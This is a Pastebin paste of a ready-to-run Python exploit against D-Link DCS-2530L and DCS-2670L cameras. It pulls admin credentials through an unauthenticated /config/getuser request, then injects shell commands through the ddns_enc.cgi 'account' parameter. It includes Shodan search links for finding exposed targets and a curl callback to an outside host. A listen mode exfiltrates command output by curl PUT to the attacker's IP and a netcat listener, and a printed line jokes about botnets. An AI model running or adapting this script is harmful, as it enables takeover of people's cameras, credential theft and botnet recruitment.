Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- '''
- Usage:
- Copy the url straight from firefox. If you want to get a netcat listener you need netcat installed
- and the listening port specified within open obviously.
- Blind execution - python3 exploit.py http://1.2.3.4/ "curl http://pingb.in/p/xxxxxxxxxxxxxxxxxx"
- Netcat listener - python3 exploit.py http://1.2.3.4/ "cat /proc/cpuinfo" --listen
- Info:
- By chaining together an unauthenticated credential disclouse 0day in multiple
- Dlink DCS cameras with an authenticated command injection in ddns_enc.cgi - it
- is possible to gain RCE.
- Confirmed vulnerable:
- DCS-2530L, DCS-2670L
- https://www.shodan.io/search?query=DCS-2670L
- https://www.shodan.io/search?query=DCS-2530L
- Limitations:
- The length of the 'account' parameter is limited to 55 characters. Longer commands
- can be executed via piping characters with "echo -ne" to a .sh or downloading a .sh
- from another host.
- The payload will be executed every 5 seconds on the host while the payload in the account
- parameter is set. This exploit triies to auto terminate after 1 execution. Ajust timing if needed.
- Patch:
- Dlink has released an advisory for the DCS-2530L but no patch. Don't port forward the
- camera until one has been released.
- Don't be an ass. Don't brick other people's shit. I'm not responsible for anything lmfao - @dogonsecurity
- '''
- import requests, sys, argparse, time, os
- from time import sleep
- from requests import get
- from urllib3.exceptions import InsecureRequestWarning
- def getcreds(host):
- try:
- r = requests.get(host + "/config/getuser?index=0", verify=False, timeout=5)
- data = r.text.split("\n")
- credentials = []
- credentials.append(data[0].replace("name=", "").replace("\r", ""))
- credentials.append(data[1].replace("pass=", "").replace("\r", ""))
- return credentials
- except Exception as e:
- print(e)
- def execpayload(host, creds, payload):
- try:
- url = "/cgi-bin/ddns_enc.cgi?enable=1&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account="
- endexec = "/cgi-bin/ddns_enc.cgi?enable=0&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=aaaa"
- # DEBUG print(payload)
- if not args.listen:
- payload = "{};{};".format(url,payload)
- r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
- print("Sent payload... Waiting for execution.")
- sleep(4)
- r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
- print("Blind exploit complete. Did it work :)?")
- else:
- ourip = get('https://api.ipify.org').text
- ourport = 3 #Change if you need to
- payload = "{};{} >a;curl -XPUT {}:{} -T a;".format(url,payload,ourip,ourport)
- # DEBUG print(payload)
- r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
- print("Sent payload... Waiting for execution.")
- os.system("sudo nc -lvp 3 &")
- sleep(7)
- r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
- os.system("sudo pkill -f nc")
- print("Listening exploit complete.")
- except Exception as e:
- print(e)
- print("Hoho is the future of botnet!!11!!")
- parser = argparse.ArgumentParser()
- parser.add_argument("target", help="target",type=str)
- parser.add_argument("payload", help="payload",type=str)
- parser.add_argument("--listen", action='store_true')
- args = parser.parse_args()
- requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
- creds = getcreds(args.target)
- print("Got credentials: " + str(creds))
- execpayload(args.target, creds, args.payload)
Add Comment
Please, Sign In to add comment